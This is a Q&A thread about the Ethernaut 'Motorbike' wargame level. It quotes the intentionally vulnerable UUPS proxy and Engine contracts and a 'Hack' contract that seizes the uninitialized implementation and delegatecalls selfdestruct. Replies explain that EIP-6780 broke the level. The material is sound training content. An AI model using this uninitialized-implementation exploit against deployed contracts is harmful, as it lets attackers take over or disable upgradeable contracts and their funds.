selfdestruct in solidity is reinitializing the contract
Hello I am trying to solve ethernaut challenge MotorBike
,code below
// SPDX-License-Identifier: MIT

pragma solidity <0.7.0;

import "openzeppelin-contracts-06/utils/Address.sol";
import "openzeppelin-contracts-06/proxy/Initializable.sol";

contract Motorbike {
    // keccak-256 hash of "eip1967.proxy.implementation" subtracted by 1
    bytes32 internal constant _IMPLEMENTATION_SLOT = 0x360894a13ba1a3210667c828492db98dca3e2076cc3735a920a3ca505d382bbc;

    struct AddressSlot {
        address value;
    }

    // Initializes the upgradeable proxy with an initial implementation specified by `_logic`.
    constructor(address _logic) public {
        require(Address.isContract(_logic), "ERC1967: new implementation is not a contract");
        _getAddressSlot(_IMPLEMENTATION_SLOT).value = _logic;
        (bool success,) = _logic.delegatecall(abi.encodeWithSignature("initialize()"));
        require(success, "Call failed");
    }

    // Delegates the current call to `implementation`.
    function _delegate(address implementation) internal virtual {
        // solhint-disable-next-line no-inline-assembly
        assembly {
            calldatacopy(0, 0, calldatasize())
            let result := delegatecall(gas(), implementation, 0, calldatasize(), 0, 0)
            returndatacopy(0, 0, returndatasize())
            switch result
            case 0 { revert(0, returndatasize()) }
            default { return(0, returndatasize()) }
        }
    }

    // Fallback function that delegates calls to the address returned by `_implementation()`.
    // Will run if no other function in the contract matches the call data
    fallback() external payable virtual {
        _delegate(_getAddressSlot(_IMPLEMENTATION_SLOT).value);
    }

    // Returns an `AddressSlot` with member `value` located at `slot`.
    function _getAddressSlot(bytes32 slot) internal pure returns (AddressSlot storage r) {
        assembly {
            r_slot := slot
        }
    }
}

contract Engine is Initializable {
    // keccak-256 hash of "eip1967.proxy.implementation" subtracted by 1
    bytes32 internal constant _IMPLEMENTATION_SLOT = 0x360894a13ba1a3210667c828492db98dca3e2076cc3735a920a3ca505d382bbc;

    address public upgrader;
    uint256 public horsePower;

    struct AddressSlot {
        address value;
    }

    function initialize() external initializer {
        horsePower = 1000;
        upgrader = msg.sender;
    }

    // Upgrade the implementation of the proxy to `newImplementation`
    // subsequently execute the function call
    function upgradeToAndCall(address newImplementation, bytes memory data) external payable {
        _authorizeUpgrade();
        _upgradeToAndCall(newImplementation, data);
    }

    // Restrict to upgrader role
    function _authorizeUpgrade() internal view {
        require(msg.sender == upgrader, "Can't upgrade");
    }

    // Perform implementation upgrade with security checks for UUPS proxies, and additional setup call.
    function _upgradeToAndCall(address newImplementation, bytes memory data) internal {
        // Initial upgrade and setup call
        _setImplementation(newImplementation);
        if (data.length > 0) {
            (bool success,) = newImplementation.delegatecall(data);
            require(success, "Call failed");
        }
    }

    // Stores a new address in the EIP1967 implementation slot.
    function _setImplementation(address newImplementation) private {
        require(Address.isContract(newImplementation), "ERC1967: new implementation is not a contract");

        AddressSlot storage r;
        assembly {
            r_slot := _IMPLEMENTATION_SLOT
        }
        r.value = newImplementation;
    }
}

The problem is to destroy the Engine contract I have to misuse the delegatecall but upon trying on its reinit-ing the contract again
Below are the steps I have done

getting the address of engine


hack contract


// SPDX-License-Identifier: MIT
pragma solidity ^0.8.24;

interface IEngine {
    function initialize() external;
    function upgradeToAndCall(address newImplementation, bytes memory data) external payable;
}

contract Hack {
    uint public exist = 123;

    function pwn(IEngine target) external {
        target.initialize();
        target.upgradeToAndCall(address(this), abi.encodeWithSelector(this.kill.selector));

    }

    function kill() public {
        selfdestruct(payable(0));
    }
}

the default behaviour should be destruct the contract but instead it reinit the contract
https://sepolia.etherscan.io/address/0xBBaea4b6290a75a85703B9fe3051d2cE32D70Eb8#code


So I tried to kill the hack contract itself in the remix and it also doesn't get selfdestruct

https://sepolia.etherscan.io/address/0x652cb251803ab71520EcB459585F18Dd6EC24b5e#code



The Motorbike level of the Ethernaut challenge is no longer valid after the release of EIP-6780, which states:

This EIP changes the functionality of the SELFDESTRUCT opcode. The new
functionality will be only to send all Ether in the account to the
target, except that the current behaviour is preserved when
SELFDESTRUCT is called in the same transaction a contract was created.

As a result, this level becomes unsolvable because it requires calling the selfdestruct function to self-destruct the Engine contract.
You can also read more about this on the Openzeppelin forum, as others are also facing the same issue.

Well, one could use a network that doesn't include that EIP. But yeah, not worth it.

Yeah, but no such test network is available to select on Ethernaut anymore, as it only lists sepolia, sepolia-optimism, sepolia-arbitrum, holesky and polygon-mumbai. Out of which,  polygon-mumbai is not working as it recently got deprecated.
